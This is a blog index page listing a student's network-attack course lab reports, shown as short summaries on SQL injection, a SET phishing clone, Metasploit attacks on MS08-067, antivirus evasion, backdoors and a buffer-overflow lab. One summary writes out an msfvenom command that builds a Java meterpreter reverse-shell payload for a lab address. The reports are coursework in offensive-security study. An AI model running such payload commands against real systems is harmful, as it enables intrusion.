会员
T恤
新闻
博问
闪存
赞助商
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
20155234昝昕明
博客园
首页
新随笔
联系
订阅
管理
2018年6月3日
20155234 昝昕明《基于ARM实验箱的国密算法应用》课程设计个人报告
摘要: 20155234 昝昕明《基于ARM实验箱的国密算法应用》课程设计个人报告 个人贡献 参与课设题目讨论及完成全过程; 资料收集; SM1算法及和ARM之间通信 负责串口代码调试; 协调完成小组结题报告; 负责实验箱的管理; 设计中遇到的问题及解决方法 开发板无法ping通主机 在虚拟机VMware里
阅读全文
posted @ 2018-06-03 20:56 zdyt
阅读(185)
评论(0)
推荐(0)
2018年5月30日
20155234《网路对抗》Exp9 WEB安全基础
摘要: 20155234 Exp9 Web安全基础 基础问答 SQL注入攻击原理,如何防御? SQL注入攻击就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意SQL命令的目的。 对于SQL注入攻击的防范,我觉得主要还是应该从代码上入手: 采用预编译语句集Pr
阅读全文
posted @ 2018-05-30 00:44 zdyt
阅读(121)
评论(0)
推荐(0)
2018年5月21日
20155234 《网络对抗》Exp 8 Web基础
摘要: 基础问答 什么是表单 可以收集用户的信息和反馈意见,是网站管理者与浏览者之间沟通的桥梁。 表单包括两个部分:一部分是HTML源代码用于描述表单(例如,域,标签和用户在页面上看见的按钮),另一部分是脚本或应用程序用于处理提交的信息(如CGI脚本)。不使用处理脚本就不能搜集表单数据。 表单通常是交由CG
阅读全文
posted @ 2018-05-21 22:23 zdyt
阅读(118)
评论(0)
推荐(0)
2018年5月10日
20155234 《网络对抗》实验七 网络欺诈防范
摘要: 简单应用SET工具建立冒名网站 检查80端口是否被占用 netstat tupln |grep 80 已经被其他进程占用则kill命令结束进程 输入命令apachectl start开启Apache服务,接着打开一个新的终端窗口,输入setoolkit打开SET工具并配置攻击 攻击成功 etterc
阅读全文
posted @ 2018-05-10 21:19 zdyt
阅读(147)
评论(0)
推荐(0)
2018年5月6日
2017-2018-2 20155234『网络对抗技术』Exp6:信息收集与漏洞扫描
摘要: whois查询 whois用来进行域名注册信息查询。以常用的百度为例,输入whois baidu.com可查询到3R注册信息,包括注册人的姓名、组织和城市等信息。 我们可以很清楚地看到baidu的3R注册信息,包括注册人的组织和城市等信息。 值得注意的是进行whois查询时要去掉www等前缀否则可能
阅读全文
posted @ 2018-05-06 16:26 zdyt
阅读(339)
评论(0)
推荐(0)
2018年4月27日
2017-2018-2 20155234『网络对抗技术』Exp5:MSF基础应用
摘要: 攻击MS08 067安全漏洞 WindowsXP 在kali输入msfconsole进入控制台,依次输入指令 第一次很遗憾失败了 发现是防火墙没关重新来过成功 攻击MS11 050安全漏洞 IE7.0 进入控制台,配置 在windows中打开IE访问 不知道为什么失败了,查看了狄老师的博客,她试验了
阅读全文
posted @ 2018-04-27 23:21 zdyt
阅读(174)
评论(0)
推荐(0)
2018年4月18日
20155234 exp4 恶意代码分析
摘要: 实验4 恶意代码分析 系统运行监控 Schtasks 先建立一个netstat20155234.txt文件,在文件中输入 date /t c:\netstat20155234.txt time /t c:\netstat20155234.txt netstat bn c:\netstat201552
阅读全文
posted @ 2018-04-18 14:21 zdyt
阅读(277)
评论(1)
推荐(0)
2018年4月10日
20155234 Exp3 免杀原理与实践
摘要: 使用msf编码器生成jar包 使用指令:msfvenom p java/meterpreter/reverse_tcp lhost=192.168.157.141 lport=5234 x 5234_backjar.jar 上传扫描的结果: 结果还行 使用veil evasion生成反弹链接的可执行
阅读全文
posted @ 2018-04-10 22:09 zdyt
阅读(218)
评论(0)
推荐(0)
2018年4月3日
20155234 Exp2 后门原理与实践
摘要: Windows获得Linux Shell 1.查看ip 2.监听端口 3.实验成功如下图 Linux获得Win Shell 1.查看虚拟机ip 2.监听端口 3.实验成功如下图 使用NC传输数据 1.用crontab e指令编辑一条定时任务 输入3,选vim.basic 2.成功 使用socat获取
阅读全文
posted @ 2018-04-03 10:09 zdyt
阅读(160)
评论(0)
推荐(0)
2018年3月18日
20155234 昝昕明 《网络对抗技术》实验一 PC平台逆向破解
摘要: 实践内容: 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。 注入一个自己制作的shellcode并运行这段shellcode 实践所涉及指令 汇编中的指令: call:使程序跳转到某
阅读全文
posted @ 2018-03-18 20:50 zdyt
阅读(178)
评论(0)
推荐(0)
下一页
公告
点击右上角即可分享